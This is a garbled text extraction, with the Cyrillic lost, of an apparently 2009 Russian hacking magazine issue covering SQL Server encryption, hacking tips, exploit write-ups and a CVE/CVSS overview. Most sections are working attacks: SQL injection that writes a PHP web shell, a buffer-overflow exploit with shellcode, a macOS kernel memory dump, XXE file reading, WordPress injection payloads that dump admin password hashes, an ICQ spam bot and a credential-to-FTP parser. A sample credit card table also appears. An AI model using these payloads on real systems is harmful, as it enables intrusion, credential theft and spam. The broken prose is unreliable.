, (
). .
SQL Server? :
dSQLSRVD. ;
DECRYPT2K.
( ),
, Google.
XP_Crypt ,

-, -
( ,
!).
, .. ,
..
, SELECT * FROM
tbl_CCards, :
Username Password CredCardNum
james god
1234567890123456
lucas sex
2894787650102827
anna
love
3234563638716434
UDF (, User-Defined-Function,

)
SHA-:
CREATE FUNCTION ud_MakeSHA1
clearpass VARCHAR (8000) )
RETURNS VARCHAR (40)
AS
BEGIN
X 04 /124/ 09
(@
035
>> pc_zone
SysComments Decryptor ,

: MS SQL
, ,
SQL Shield
DECLARE @ret as VARCHAR(40)

EXEC master..xp_sha1 @clearpass,@
ret OUTPUT
RETURN @ret
END
: UPDATE tbl_CCards SET

password = dbo.ud_MakeSHA1(Password).
. ?
, ! ,

. ,
, :
CREATE FUNCTION ud_CheckUser (@
username
VARCHAR(16),@clear_pass
036
VARCHAR (16))
RETURNS INTEGER
AS BEGIN
DECLARE @res INTEGER
SELECT @res = count(*) FROM tbl_
CCards where username=@username AND
password=dbo.ud_MakeSHA1(@clear_
pass)
IF @res > 1 SELECT @res= 0
RETURN @res
END
:
SELECT
dbo.ud_CheckUser
('anna,'kolbaska')
>1 ()
SELECT
dbo.ud_CheckUser
('anna','love')
>0 (!)

. ,

- (
PCI; , ,
). XP_CRYPT

256- RSA.
- ( , , 768- ).

, .
,

, .
, ! z
X 04 /124/ 09
>>
Easy Hack}
R0ID
SKVOZ
PSYCHO.
/ R0ID@MAIL.RU /
/ X0WL.X0WL@GMAIL.COM /
: MYSQL
:
1. Web- , .
:
/templates_compiled/
/templates_c/
/templates/
: PHPMYADMIN
:
1. - PhpMyAdmin.
2. :
/temporary/
/images/
/cache/
/temp/
/files/
2. (, 4), :
UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3,4
INTO OUTFILE "/var/www/html/temp/c.php" --
3. http://victim.com/temp/c.php.
4. :
CREATE TABLE backdoor(
Stack TEXT
) TYPE=MYISaM;
INSERT INTO backdoor(Stack)
VALUES(
'<pre><body bgcolor=silver<? @system($_
REQUEST["v"]); ?></body></pre>')
CREATE DATABASE 'backdoor'
5.
3.
SELECT @@datadir
> C:\AppServ\MySQL\data\
: ,
:
, , ,
- . ,
online-flv.
, :
1. ru.savefrom.net. ,
.
2. . HTML-
.
038
SELECT * into dumpfile 'C:\AppServ\www\s.php' from

backdoor;
6. victim.com/s.php?v=.
3. URL .
4. ,
, . URL flv-.
exit();}
$file = fopen($file_uin,'r');
while (!feof($file)) {
$buffer = trim(fgets($file));
$icq->send_message($buffer, $message);
echo Message sent to $buffer \n;
flush();
sleep($pause);
}
$icq->disconnect();
X 04 /124/ 09
>>
4
: BIND 8 BIND 9, ,

:
Bind 9 ( 9.1.0) CHAOS- authors.

.
1. linux/freebsd
dig ns.example.com authors.bind chaos txt
2. windows/linux/freebsd
% nslookup -q=txt -class=CHAOS authors.bind. ns.example.com
Server: ns.example.com
:
:
, .
Malzilla (malzilla.sourceforge.net).
, unescape-
Address: 23.23.23.23
authors.bind text = Bob Halley
authors.bind text = Mark Andrews
authors.bind text = James Brister
authors.bind text = Michael Graff
authors.bind text = David Lawrence
authors.bind text = Michael Sawyer
authors.bind text = Brian Wellington
authors.bind text = Andreas Gustafsson
3. , !
, :
alert UDP $EXTERNAL any -> $INTERNAL 53 (msg: "IDS480/
named-probe-authors";
content: "|07|authors|04|bind; depth: 32; offset: 12;
nocase;)
UDP- 53 ,
, , .
, UCS2- JS . ,
:
1.
Download.
2. Send script to Decoder, Run script.
3. ( )
.
4. , Misc
decoders.
, malware- :
malwaredomainlist.com, zeustracker.abuse.ch.
! Malzilla .exe
X 04 /124/ 09
039
>>
: ICQ- PHP
:
ICQ- . ,
,
. , :
? ,
PHP. , ? ,
:
1.
WebIcqLite.class.php, DVD.
2.
include('WebIcqLite.class.php');
3. , Pashkela:
<?php
@set_time_limit(0);
@ini_set("display_errors","1");
ignore_user_abort(1);
include('WebIcqLite.class.php');
$ini = parse_ini_file("icq.ini");
$uin = $ini[uin];
// UIN
$pass = $ini[pass];
// UIN
$file_uin = $ini[file_uin]; // ,
$message = $ini[message];
//
$pause = $ini[pause];
//
define('UIN', $uin);
define('PASSWORD', $pass);
$icq = new WebIcqLite();
if(!$icq->connect(UIN, PASSWORD)) {
: PASSWORDPRO FTP-
:

PasswordPro.
:). ,
. ,
SQL- , MySQL-
PasswordPro. ,
, FTP.
,
PasswordPro admin:5ba686200919b19f:narym7
- ftp://admin:narym7@127.0.0.1. , :
1. , , Small
parser for passwordpro evil_packman DVD :). 2. PasswordPro first.txt, :
ICQ- PHP
echo $icq->error;
exit();
}
$file = fopen($file_uin,'r');
while (!feof($file)) {
$buffer = trim(fgets($file));
$icq->send_message($buffer, $message);
echo Message sent to $buffer \n;
flush();
sleep($pause);
}
$icq->disconnect();
exit();
?>
4. icq.ini :
uin = 123456 ; UIN,
pass = 1234 ; UIN,
file_uin = uin.txt ; UIN
message = test, do not reply this message, bot-test ;
,
pause = 2 ; ,
( )
5. uin.txt ,
.
, .
:).
web:5ba686200919b19f:nfgavr
2. , PHP.
( :)).
3. first.txt ( )
.
4. :
C:\php\php C:\parser.php first.txt out.txt 127.0.0.1,
first.txt PasswordPro, out.txt , 127.0.0.1 IP ftp-.

5. out.txt c:
PasswordPro
admin:5ba686200919b19f:narym7
news:5ba686200919b19f:wens6
root:5ba686200919b19f:sawbdv
swin:5ba686200919b19f:zasut4
040
X 04 /124/ 09
>>
ftp://admin:narym7@127.0.0.1
ftp://news:wens6@127.0.0.1
ftp://root:sawbdv@127.0.0.1
ftp://swin:zasut4@127.0.0.1
:
, Blind SQL-Injections
SQL-, . , .
,
, . Grey, - .
:
: version(), user(),
database(), mysql >= 3 .
, mysql >= 4.1 .
,
mysql >= 4.1 .
, mysql >= 4.1
.
, mysql >= 3 .
, -
, mysql >= 4.1 .
, information_schema.tables mysql => 5
.
, , information_schema.
columns mysql => 5 .
, information_schema.tables mysql => 5
.
;
, :
, ;
, .
PostgreSQL: version(),
current_user(), current_database().
PostgreSQL.
ftp://web:nfgavr@127.0.0.1
, -
FTP.

dic/grey_field_name.txt
3. (
) .
4. , config.php main.php.
5. config.php.
:
$host = ''; //
$port = ; //
$path = ''; // ( /)
$vars = ""; // ( ,
sql- ):
,
// , , , , ,
$strend = ''; // ('--+', '/*', '#'),

$method = ; // ():
// 0 POST; POST
// 1 GET; GET
// 2 GET/COOKIE; COOKIE
$type = ; // (0 1): sql-:
// 0
,

// 1
( ),

$text = ; // ,
6. http:////main.php.
7. 30 , -
.
8. result.txt.
! ,
, . z
Blind SQL-Injections
, :
1. DVD.
2. , :
main.php
config.php
lib_and_data/grey_data.php

lib_and_data/function.php
sql-
dic/grey_table_name.txt X 04 /124/ 09
041
>>
SKVOZ
01
WORDPRESS MU
>> Brief
Wordpress MU ,
( ). choose_primary_blog ( wp-includes/wpmu-functions.php).
.
1830 function choose_primary_blog() {
1831
global $current_user;
1832
?>
1833
<table class=form-table>
1834
<tr>
1835
<th scope=row><?php _e(Primary Blog); ?></th>
1836
<td>
1837
<?php
1838
$all_blogs = get_blogs_of_user( $current_
user->ID );
1839
if( count( $all_blogs ) > 1 ) {
...
1848
} else {
1849
echo $_SERVER[HTTP_HOST];
1850
}
1851
?>
1852
</td>
1853
</tr>
1854
</table>
1855
<?php
1856 }
1849 , ,
- , HTML/
JS-. HTTP- , WEB-
(WebScarab, Burpsuite).
042
X 04 /124/ 09
>> Targets:
Wordpress MU < 2.7
>> Exploit
$ curl -H "Cookie: " -H Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html
>> Solution
, ( ,
WordPress , . Forb).
APPLE MACOS X XNU <= 1228.X LOCAL KERNEL

MEMORY
DISCLOSURE
>> Brief
Apple MacOS
i386_set_ldt
i386_get_ldt .
, Intel-based . , ,
2005 FreeBSD
( , Unix- ). ,
MacOS. , : ( GDT), (
), .
(LDT) , . ,
LDT, GDT (
).
Pentium : LDT GDT.
i386_get_ldt , LDT (Local Descriptor Table) .
:
#include <machine/segments.h>
#include <machine/sysarch.h>
int i386_get_ldt (int start_sel, union descriptor
*descs, int num_sels);
,
.
>> Targets
Apple Mac OS X <10.5.6
>>
if (n < 0)
{
fprintf (stderr, "failed i386_get_ldt(): %d\n", n);
return (EXIT_FAILURE);
}
num_desc = n;
printf ("i386_get_ldt: num_desc: %d\n", num_desc);
fd = open (
TMP_FILE, O_CREAT | O_RDWR, S_IRUSR | S_IWUSR);
if (fd < 0)
{
fprintf (stderr, "failed open(): %d\n", fd);
}
// mmap
ptr = mmap (NULL, READ_SIZE, PROT_READ | PROT_WRITE,
MAP_ANON | MAP_PRIVATE, -1, 0);
if ((int) ptr == -1)
{
fprintf (stderr, "failed mmap()\n");
}
// ,
READ_SIZE ptr
memset (ptr, 0x00, READ_SIZE);
i386_get_ldt (num_desc 1,
(union ldt_entry *) ptr, -(num_desc 1));
//
n = write (fd, ptr, READ_SIZE);
munmap (ptr, READ_SIZE);
close (fd);
printf ("%d-bytes of kernel memory dumped to: %s\n",
n, TMP_FILE);
return (EXIT_SUCCESS);
}
>> Solution
.
02
FULL DISCLOSURE

FTP-.
>> Brief
, fuzzing FTP-.
win32_exec payloada -
, ,
>> Exploit
http://milw0rm.com/exploits/8108
:
#define TMP_FILE "/tmp/xnu-get_ldt"
#define READ_SIZE 0x2000000
int
main (int argc, char **argv)
{
int fd, n, num_desc;
void *ptr;
n = i386_get_ldt (0, ((int)NULL) + 1, 0);
X 04 /124/ 09
043
>>
calc.exe
: ,
.
, FTP-
. ,
( )
,
.
, ,
Infigo FTP Fuzz (infigo.hr/files/ftpfuzz.zip). , .
anonymous-, -
. ,

(OllyDbg).
Olly. , . FaultMon (research.eeye.com/html/tools/RT20060801-4.
html) .
OllyDbg -P ( PID ).
FaultMon.
Golden FTPd. .
Olly,
Debug > Restart. -
USER , EIP 41414141.
, 3000 .
-
. OllyDbg: Overflow
Return Address ASCII Overflow returns Search JMP/Call ESP.
, View Log, jmp esp, call esp DLL.
View Executable Modules OpCodeDB Metasploit
: 0x750362c3 ws2_32.dll (opcode
pop,pop.ret). , pop,pop.ret.
, ,
pop (0x750362c4).
- win32_exec Metasploit (payloads):
EIP
"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4"
# (3000 bytes)
sc = 'A' * 3000
# calc.exe Shellcode(172 bytes)
sc += "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
sc += "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
sc += "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
sc += "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
sc += "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
sc += "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
sc += "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
sc += "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
sc += "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
sc += "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
sc += "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4"
# Windows 2000 SP0,1,2,3,4 (pop,pop,ret+1)= (pop,ret)

# Thanks Metasploit!
return_address='\xC5\x2A\x02\x75
buffer = '\xEB\x30' + ' /' + sc + return_address + '\r\n\r\n'
print buffer
!
calc.exe
.
.
antiparser (antiparser.
sourceforge.net) API, Python
.
?
"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
044
apChar()
apCString() ( ),

apKeywords() ,
X 04 /124/ 09
>>
FTP-

apLong() 32-
apShort() 16-
apString() (aka free form
string)
apKeywords(). , : [ (, FTP)]
[][ ( )][
]. FTP :
#
From antiparser import *
#
CMDLIST = ['ABOR', ALLO', 'APPE', 'CDUP', 'XCUP',

'CWD', 'XCWD', 'DELE', 'HELP', 'LIST', 'MKD', 'XMKD',
'MACB, 'MODE', 'MTMD', 'NLST', 'NOOP', 'PASS', PASV',
'PORT', 'PWD', 'XPWD', 'QUIT', 'REIN', 'RETR', 'RMD',
'XRMD', 'REST', 'RNFR', 'RNTO', 'SITE', 'SIZE', 'STAT,
'STOR', 'STRU', 'STOU', 'SYST', 'TYPE', 'USER']
#
SEPARATOR = ""
TERMINATOR = "\r\n"
for cmd in CMDLIST:
# API
Ap = antiparser()
#
cmdkw = apKeywords()
# ,
cmdkw.setKeywords([cmd])
cmdkw.setSeparator(SEPARATOR)
cmdkw.setTerminator(TERMINATOR)
# ,
X 04 /124/ 09
Metasploit
cmdkw.setContent(r%n%n%n%n%n%n%n%n%n%n%n%)
# , 65536
cmdkw.setMode('incremental')
cmdkw.setMaxSize(65536)
045
>>
03
NEXTAPP
ECHO XML
INJECTION
>> Brief:
. : XML-, ,
XML-.
:
, Http-Analyzer Mozilla
Tamper Data,
ap.append(cmdkw)
#
sock = apSocket()
sock.connect(HOST, PORT)
print sock.recv(1024)
sock.sendTCP(ap.getPayload())
print sock.recv(1024)
sock.close
.
CWD/CDUP. Access violation
, ,
( Read of).
(Write to) , ,
.
OllyDbg (Options Debugging
Options Exceptions) Memory Access Violation, Single Step Break.
>> Targets
:
WinFTP 2.3.0
LIST (LIST *<>). arbitary- (http://milw0rm.com/exploits/7875).
GuildFTPd FTP Server Version 0.x.x
DELETE (http://milw0rm.
com/exploits/8200).
directory traversal ( \..).
WFTPD Explorer Pro 1.0
(http://milw0rm.com/exploits/7913).
Serv-U 7.4.0.1
(http://
milw0rm.com/exploits/8211).
, ,

. , , . ( 2000) SMNT

.
46
046
<client-message xmlns=http://www.nextapp.
com/products/echo2/climsg trans-id=3
focus=c_25><message-part xmlns= processor=E
choPropertyUpdate><property component-id=c_25
name=text>aa</property><property componentid=c_25 name=horizontalScroll value=0/><property
component-id=c_25 name=verticalScroll
value=0/></message-part><message-part xmlns=
processor=EchoAction><action component-id=c_25
name=action/></message-part></client-message>
:
<?xml version=1.0?><!DOCTYPE sec [<!ELEMENT sec
ANY><!ENTITY mytestentity SYSTEM "file:///c:\boot.
ini">]>
, XML . , ,
, boot.ini, XML-.
>> Targets
NextApp Echo < 2.1.1
>> Exploits
http://milw0rm.com/exploits/8191
, XML-requesta
JS/HTTP-POST.
04
FTS_*
LIBC (HTTP://MILW0RM.COM/
EXPLOITS/8163).

. fts
UNIX ftp_open()
,
:
fts_read ,
;
fts_children() ,
.
, :
typedef struct _ftsent {

unsigned short fts_info; /* FTSENT-*/
char *fts_accpath; /* */
char *fts_path; /* */
size_t fts_pathlen; /* strlen(fts_path) */
char *fts_name; /* */
size_t fts_namelen; /* strlen(fts_name) */
short fts_level; /* (-1 N) */
X 04 /124/ 09
>>
int fts_errno; /* */
long fts_number; /* */
void *fts_pointer; /* */
struct _ftsent *fts_parent; /* */
struct _ftsent *fts_link; /*
*/
struct _ftsent *fts_cycle; /*
*/
struct stat *fts_statp; /*
*/
} FTSENT;
, fts_level short. . :
- ---line-616-625--/*
* Figure out the max file name length that can
be stored in the
* current path -- the inner loop allocates
more path as necessary.
* We really wouldnt have to do the maxlen
calculations here, we
* could do them in fts_read before returning
the path, but its a
* lot easier here since the length is part of
the dirent structure.
*
* If not changing directories set a pointer so
that can just append
* each new name into the path.
*/
- ---line-616-625---
, - ...
pathlen-. , ,
? , , .
#define NAPPEND(p)\
(p->fts_path[p->fts_pathlen 1] == / \
? p->fts_pathlen 1 : p->fts_pathlen)
, , .
127# pwd
/home/cxib
#
127# du /home/
4
/home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
127# chmod -R 000 Samotnosc
>> Targets
OpenBSD 4.4 (/usr/src/lib/libc/gen/fts.c)
Microsoft Interix 6.0 10.0.6030.0 x86
Microsft Vista Enterprise (SearchIndexer.exe) z
X 04 /124/ 09
47
>>
Secunia
BID
OSVDB
SKVZ
ISS X-Force
,
,
. , ,
. ,
>>
? .

.
.
,
.
CVE,
NCSD (National Cyber
Security Division)
. .
VE (COMMON VULNERABILITIES AND

EXPOSURES)
, CVE ,
, ,
, Bugtrack-. CVE
(NVD nvd.nist.gov) (cve.mitre.org/data/downloads).
,
048
: xml, html, csf, xsd schema. -

,
CVE
( ,
).
CVE :
CVE ID, Reference Description.
ID , CVE-1999-03.
Reference
,
.
Description . , CVE
, ,
WEB-.
,
-
:
(, ),
, .
?
()
. -,
,

.

. MITRE Corporation (mitre.org) , ,
.
,
.
. ,

X 04 /124/ 09
>>
BID
OSVDB
Secunia

. $5000 .
BID
Securityfocus (
securityfocus.com/vulnerabilities).
BID CVE. ,
BID CVE ,
, .

, ,
..
,
, , ,
BID
.
OSVDB
:
.
.
.

. :
( / ) ( ,
-
).
SECUNIA
,
secunia.com,
.
, - ,
,

.
, . CVSS v.2
: ,
.
.
ISS X-FORCE
ISS , -,
,
. , Microsoft Excel Remote
Code Execution,
,
,

.
,
security- Perimetrix
(securitylab.ru/blog/company/Perimetrix_blog).

.

CVSS 2.
,
.

.

CVSS Base Score =
9.2. ?
:

. .
undercover vulnerabilities , . ,
(securitymetrics.org/content/Wiki.
jsp), ,
.
.
X 04 /124/ 09
BaseScore = round_to_1_decimal(((
0.6*Impact)+(0.4*Exploitability)1.5)*f(Impact))
.
first.org/cvss.
, .
: AV:N/
AC:L/Au:N/C:N/I:N/A:C.
, !
. , .
Access Vector: Network
.
,
.

. , ,
, ,
.
, ,
. ,
-
.
,
. ,
,
-. .
049
>>
Secunia
Base Score Microsoft Windows

Kernel GDI
. CVE
info
Unix
Known Problem
List, Internal Sun
Microsystems Bug
List,

CERT
.
BID
.
.
RPC.
Access Complexity: Low :
.
, ,
.
Authentication: None . , ,
-
(-, , ),
.
Confidentiality Impact: None
. Integrity Impact: None .
.
,
, C () P (, partial).
Availability Impact: Complete , ,
, .
, Availability Impact Complete.

. ,
.
.
? ,
050
. ,
, ( ,
, ).
,
.
? , , .
? .
.
Exploitability (E) . ,
.
(, , ),
. ,
. : U ( ), Proof-of-Concept (POC
), F (,
), H (high risk ,

), ND ( ,
,
). Remediation Level (RL) .
,
? ,
(, ),

.
Report Confidence (RC) .
!
X 04 /124/ 09
>>
BID
OSVDB
Secunia
osvdb.org.
,

CVSS
:
.
,
.

?
Report Confidence.
//.

. ,

. Collateral Damage Potential (CDP)
.
. , , DoS-.
, CVSS (2).
, , .
, . Base Score NVD
,
, .

- ( ).
Target Distribution (TD) .
,

? ,
,
, .

-
. -, , -
. ,
(NERC-CIP,

CVE: ISS, BID, Secunia, SecurityTracker, OSVDB
BID: CVE, Bugtraq, ISS, Secunia, SecurityTracker, OSVDB
ISS: CVE, BID, Secunia, SecurityTracker, OSVDB
Secunia: CVE, OSVDB
SecurityTracker: CVE, OSVDB, Nessus
Nessus: CVE, BID, OSVDB
OSVDB: CVE, BID, Secunia, SecurityTracker, ISS, Nessus, Snort
X 04 /124/ 09
PCI, FISMA, GLBA HIPAA)

, ,
. , AirMagnet,
ISS
Security Scanner.
ID. Nessus,
.

, Common
Criteria Web Application Security Scoring
(CCWAPSS) 1.1. ,
, ,
.
?
, . ,

, . ,
,
,
,

. z
051
>>
SKVZ
WordPress:
WorldPress , ( Powered by WordPress 74 400 000

!). , . : 5-
, , , seo-friendly
.
>>
?
][
WordPress.
.
, - SQL-
2.2.2 28 2007 Alexander
Concha ( ).
, ,
advisory .
. , 2.3.3 ,
XSS- html kses ( , , ). ,
: ,
, .
Charset
Remote SQL Injection ( <=2.3.3), -. ?
MySQL GBK BIG5.
.
052
WordPress <=2.3.2 xmlrpc.php Post

Edit Unauthorized Access Vulnerability ( FAQ United),
subscriber . , draft, . , .
2.3.x , WordPress cat
Parameter Directory Traversal Vulnerability, FAQ. ,
, Windows-.
SQL Column
Truncation (Admin Takeover),
.
, ,
rainbow 40 80 (, 2-4 ), ,
.
? . , .
, ,
.
X 04 /124/ 09
>>
WORDPRESS COMMENTS HTML SPAM VULNERABILITY

,
WordPress Comments Html Spam Vulnerability.
, 1.5
( ) 2.7.1.
. ./wp-includes/
comment.php :
function check_comment($author, $email, $url, $comment,
$user_ip, $user_agent, $comment_type) {
...
if ( 'trackback' == $comment_type || 'pingback' ==
$comment_type ) { // check if domain is in blogroll
$uri = parse_url($url);
$domain = $uri['host'];
$uri = parse_url( get_option('home') );
$home_domain = $uri['host'];
if ( $wpdb->get_var($wpdb->prepare("SELECT
link_id FROM $wpdb->links WHERE link_url LIKE (%s) LIMIT
1", '%'.$domain.'%')) || $domain == $home_domain )
return true;
else
return false;
}
...
}
?
1. URL , parse_url ( , Trackback,
).
2. (
), check_comment() true.
3. check_comment(),
.
.
. WordPress
- , parse_url.
http://www.php.net/parse_url: This function is not meant to
validate the given URL.
, parse_url()
! -
http://%/suck_wordpress, $uri[host]
%.
, , evil- sql-,
:
"SELECT link_id FROM wp_links WHERE link_url LIKE %%%
LIMIT 1"
true, - :).
! ./wptrackback.php, ($excerpt)
:
function wp_html_excerpt( $str, $count ) {
$str = strip_tags( $str );
X 04 /124/ 09
$str = mb_strcut( $str, 0, $count );

// remove part of an entity at the end
$str = preg_replace( '/&[^;\s]{0,6}$/, '', $str );
return $str;
}
, . :
1. strip_tags() <br/> ( ,
);
2. kses- html-,
.
, :
<html>
<form action="http://lamer.com/wp/wp-trackback.
php?p=[ID_]" method="post">
: <input name=title value="commenter"/><br/>
URL:<input name="url" value="http://%/la.com"/><br/>
Comment:<input name="excerpt" value=""/><br/>
<input name="blog_name" value=Blog" /><br/>
<input type="submit" value="ok"/>
</form>
</html>
Comment :
< b >< a href="http"//ya.ru"> < / a >< / b >
,
. :
SEO Yahoo, , MSN,
rel=nofollow,
.
RSS- DASHBOARD

WordPress, RSS- . , Dashboard : , incoming links, devblog c wordpress.
org WordPress. 2.5,
Edit,
, .
,
( ). .
,
security- (
) . (, )
. - html-
- :
<form action="http://lamer.com/wp265/wp-admin/"
method="post">
<input name="widget-rss[1][url]" type="text"
value="http://___evilrss.com/feed.xml" />
<input name="widget-rss[1][title]" type="text"
053
>>
Opera
admin takeover
links
wordpress.org/
download/releasearchive/
WordPress.
milw0rm.com/
exploits/4721
Charset Remote
SQL Injection
Vulnerability.
buayacorp.com/
files/wordpress/
wordpress-sqlinjection-advisory.
html Remote
SQL Injection in
WordPress and
WordPress MU.
securityfocus.
com/bid/27669
WordPress
'xmlrpc.php' Post
Edit Unauthorized
Access Vulnerability.
securityfocus.
com/bid/28845
WordPress
'cat' Parameter
Directory Traversal
Vulnerability.
create_function
value=" " />

<input name="widget-rss[1][items]"
value=" " />
<input name="widget-rss[1][show_summary]"
type="checkbox" value="1" checked="checked"/>
<input name="widget-rss[1][show_author]"
type="checkbox value="1" />
<input name="widget-rss[1][show_date]"
type="checkbox" value="1" checked="checked"/>
<input type="hidden" name="widget-rss[1]
[submit]" value="1" />
<input type='hidden' name='sidebar'
value='wp_dashboard' />
<input type='hidden' name='widget_id'
value='dashboard_primary' />
<input type='submit' value='Save' />
</form>
,
evil-rss :).
, :
1. ;
2. 2.5 2.6.5 .
. 1
,
WordPress Pingback
Trackback. , , , 2 (!) sql 2.5.1
author/editor (WordPress MU also affected).

2.3.3. ./wp-includes/post.php :
function add_ping($post_id, $uri) {
// Add a URL to those already pung
global $wpdb;
$pung = $wpdb->get_var("SELECT pinged FROM
054
$wpdb->posts WHERE ID = $post_id");

$pung = trim($pung);
$pung = preg_split('/\s/', $pung);
$pung[] = $uri;
$new = implode("\n", $pung);
$new = apply_filters('add_ping', $new);
return $wpdb->query("UPDATE $wpdb->posts
SET pinged = '$new' WHERE ID = $post_id");
}
, add_ping
.
,
- !
.
:). ,
:
1. . :
<a href="http://_/?p=[_
]">pingme</a>
(, http://lamer/
wp1/?p=2).
2. 2.3.x-2.5.1 , Send trackbacks to: :
test',post_title=(select/**/concat(user_
login,':',user_pass)/**/from/**/wp_users/**/
where/**/id=1),post_content_filtered =blah
.
,
html-
:
X 04 /124/ 09
>>
Parse_str sql-
WordPress
<a href="http://lamer/wp1/?p=2">pingme</a>
! ,

SQL-,
,
2.3.X
2.7.1.
.
. 2
SQL-
. ./wp-includes/comment.php :
function do_trackbacks($post_id) {
...
$to_ping = get_to_ping($post_id);
...
if ( $to_ping ) {
foreach ( (array) $to_ping as $tb_ping ) {
$tb_ping = trim($tb_ping);
if ( !in_array($tb_ping, $pinged) ) {
trackback($tb_ping, $post_title,
$excerpt, $post_id); $pinged[] = $tb_ping;
} else {
$wpdb->query(UPDATE $wpdb->posts SET to_
ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID =
'$post_id'");
}
}
}
}
X 04 /124/ 09
: $to_ping - .
SQL- .
1. Send trackbacks to: :
test','')),post_title=(select/**/concat(user_
login,':',user_pass)/**/from/**/wp_users/**/where/**/
id=1),post_content_filtered=TRIM(REPLACE(to_ping,'blah
2. ,
;
3. .
PARSE_STR
SQL-, , 2.3.x
2.7.1.
manage_links. WordPress 2.3.3. , ./wp-admin/link-manager.php.
:
get_bookmarks( "category=$cat_id&hide_invisible=0&orde
rby=$sqlorderby&hide_empty=0" );
, :
./wp-includes/bookmark.php
function get_bookmarks($args = '') {
...
$r = wp_parse_args( $args, $defaults );
extract( $r, EXTR_SKIP );
...
if ( ! empty($category_name) ) {
if ( $category = get_term_by('name',
$category_name, 'link_category') )
$category = $category->term_id;
}
...
./wp-includes/formatting.php
function wp_parse_args( $args, $defaults = '' ) {
if ( is_object($args) )
$r = get_object_vars($args);
else if ( is_array( $args ) )
$r =& $args;
else
wp_parse_str( $args, $r );
if ( is_array( $defaults ) )
return array_merge( $defaults, $r );
else
return $r;
}
055
>>
Pingback sql-
Magic SEO Toolz WordPress
function wp_parse_str( $string, &$array ) {

parse_str( $string, $array );
if ( get_magic_quotes_gpc() )
$array = stripslashes_deep( $array );
$array = apply_filters( 'wp_parse_str', $array );
}
./wp-includes/taxonomy.php
function get_term_by($field, $value, $taxonomy, $output
= OBJECT, $filter = 'raw') {
...
} else if ( 'name' == $field ) {
// Assume already escaped
$field = 't.name';
...
$term = $wpdb->get_row("SELECT t.*, tt.* FROM
$wpdb->terms AS t INNER JOIN $wpdb->term_taxonomy
AS tt ON t.term_id = tt.term_id WHERE tt.taxonomy =
'$taxonomy' AND $field = '$value' LIMIT 1");
WordPress , :
1. parse_str urldecode, , - ( wp_parse_str stripslashes);
2. get_bookmarks()
parse_str (%26 urlencode).
, , blind sql-:
http://lamer.com/wp233/wp-admin/link-manager.php?cat_
id=all%26category_name=0%2527+union+select+1,2,3,4,5,
6,7,8,9,10+from+wp_users+where+1=1/*&order_by=order_
url&action=Update+%C2%BB
:
) 1=1 ;
) 1=2 .
056
WORDPRESS 2.5 COOKIE INTEGRITY

PROTECTION VULNERABILITY
, , Cookie Integrity Protection
Vulnerability. WordPress 2.5. advisory
, , . : 2.5, WordPress
,
. :
"wordpress_".COOKIEHASH = USERNAME . "|" . EXPIRY_TIME .
"|" . MAC
:
COOKIEHASH md5- URL , ;
USERNAME ;
EXPIRY_TIME ;
MAC HMAC-,
,
. , ,
.
, :
1. admin99;
2. ;
3. ( :
cookies) :
:
wordpress_[] = admin99||MAC
:
wordpress_[] = admin|99|MAC
,
.
WORDPRESS 2.7.X ADMIN REMOTE CODE EXECUTION EXPLOIT

create_function (
Ryat[puretot]) , - ,
!
2.7,
( 2.7.1) - .
./wp-admin/post.php:
if ( current_user_can('edit_post', $post_ID) ) {
if ( $last = wp_check_post_lock( $post->ID ) ) {
$last_user = get_userdata( $last );
X 04 /124/ 09
>>
RSS- WordPress 2.5-2.6.5
WordPress
2.x
$last_user_name = $last_user ? $last_user>display_name : __('Somebody');
$message = sprintf( __( 'Warning: %s is currently
editing this post' ), wp_specialchars( $last_user_name ) );
$message = str_replace( "'", "\'", "<div
class='error'><p>$message</p></div>" );
add_action('admin_notices', create_function(
'', "echo '$message';" ) );
}
else { wp_set_post_lock( $post->ID );
wp_enqueue_script('autosave');
}
}
, edit_post
:
1. display_name - \;phpinfo();\.
$message :
Warning: \';phpinfo();\' is currently editing this post
